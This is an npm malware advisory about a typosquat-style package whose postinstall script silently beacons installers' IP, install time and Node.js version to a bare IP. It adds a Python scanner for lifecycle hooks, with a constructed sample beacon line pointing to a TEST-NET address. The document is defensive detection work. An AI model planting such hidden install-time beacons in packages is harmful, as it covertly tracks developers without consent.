MAL-2026-5909
Malicious code in react-hook-use-debounce-throttle-12 (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f7491b25e457c908dae1b32fe800f461843e4463807c8590044e4b7cc769843a)

package.json declares a postinstall script that uses Node's https module to issue an HTTP GET to the bare IP 8.140.205.78:80 on every `npm install`. The request is wrapped in try/catch and an `.on('error', ...)` handler that swallows failures, so the beacon never surfaces in operator output. The package advertises itself as a React debounce/throttle hooks library, functionality that requires no install-time network I/O. The beacon discloses each installer's public IP address, install timestamp, and Node.js version (via the default User-Agent) to a host with no relationship to the stated purpose. The package also shows typosquat-shape naming (a `-12` numeric suffix on a generic React hook utility name) and placeholder author metadata (`dev-utils <dev@utils-lib.dev>`, plus a GitHub path that does not correspond to a known publisher), consistent with victim-enumeration / install-tracking infrastructure.
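As an added defensive check (not code from the advisory, its source, or the package), a scanner for the pattern described above: it walks a node_modules tree and flags preinstall/install/postinstall hooks, or the local .js files they run, that reference a bare IPv4 literal or Node's http/https module. The sample tree it builds is constructed, using a TEST-NET address rather than the advisory's indicator.

```python
"""Flag npm install-lifecycle hooks that beacon to bare IPs (added example,
not code from the package or the advisory source)."""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")
NET_MODULE = re.compile(r"""(?:require\(\s*|from\s+)['"](?:node:)?https?['"]""")

def inspect_hook(cmd: str, pkg_dir: Path) -> dict:
    """Scan one lifecycle command plus any local .js file it invokes."""
    text = cmd
    for token in cmd.split():  # "node setup.js" -> also read setup.js
        target = pkg_dir / token
        if target.suffix == ".js" and target.is_file():
            text += "\n" + target.read_text(errors="ignore")
    return {"bare_ips": sorted(set(IPV4.findall(text))),
            "uses_net_module": bool(NET_MODULE.search(text))}

def scan_node_modules(root: Path) -> list:
    """One finding per lifecycle hook under root that looks like a beacon."""
    findings = []
    for manifest in sorted(root.rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(errors="ignore"))
        except (json.JSONDecodeError, OSError):
            continue
        for hook, cmd in (data.get("scripts") or {}).items():
            if hook in LIFECYCLE and isinstance(cmd, str):
                result = inspect_hook(cmd, manifest.parent)
                if result["bare_ips"] or result["uses_net_module"]:
                    findings.append({"package": data.get("name", manifest.parent.name),
                                     "hook": hook, "command": cmd, **result})
    return findings

def build_sample_tree() -> Path:
    """Constructed sample: one beaconing package (TEST-NET IP), one benign."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    bad, good = root / "hooks-beacon-sample", root / "clean-lib-sample"
    for d in (bad, good): d.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps(
        {"name": "hooks-beacon-sample", "scripts": {"postinstall": "node setup.js"}}))
    (bad / "setup.js").write_text(  # swallows errors, like the hook in the advisory
        "try { require('https').get('http://198.51.100.7:80/')"
        ".on('error', () => {}); } catch (e) {}\n")
    (good / "package.json").write_text(json.dumps(  # no lifecycle hook at all
        {"name": "clean-lib-sample", "scripts": {"test": "jest"}}))
    return root
```

Running `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops such hooks from executing at all, at the cost of breaking packages that legitimately need install scripts.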
Affected packages
No fixed version published yet for react-hook-use-debounce-throttle-12 (npm). Pin to a known-safe version or switch to an alternative.